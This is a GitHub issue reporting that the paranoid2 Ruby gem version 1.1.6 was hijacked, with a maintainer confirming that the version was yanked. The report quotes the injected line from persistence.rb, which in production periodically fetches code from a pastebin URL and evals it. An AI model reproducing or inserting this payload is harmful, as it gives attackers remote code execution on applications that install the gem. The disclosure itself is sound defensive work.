Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hi,
paranoid2 version 1.1.6 is compromised and a malware. Please remove it! The attack is similar to the recently reported strong_password and the code snippet is located at: paranoid2-1.1.6/lib/paranoid2/persistence.rb:
strong_password
_!{Thread.new{loop{_!{sleep rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/X9S6XQFx')))}}}if Rails.env[0]=="p"}
https://rubygems.org/gems/paranoid2 https://withatwist.dev/strong-password-rubygem-hijacked.html
The text was updated successfully, but these errors were encountered:
It looks like it aims to https://github.com/vitorgamer58/Bolsotrade-Graviex.
Sorry, something went wrong.
also to https://www.peatio.com/
The compromised version has been yanked, and the account that pushed the malware has been blocked. Thanks for reporting this!
No branches or pull requests
Hi,
paranoid2 version 1.1.6 is compromised and a malware. Please remove it! The attack is similar to the recently reported
strong_passwordand the code snippet is located at:paranoid2-1.1.6/lib/paranoid2/persistence.rb:
https://rubygems.org/gems/paranoid2
https://withatwist.dev/strong-password-rubygem-hijacked.html
The text was updated successfully, but these errors were encountered: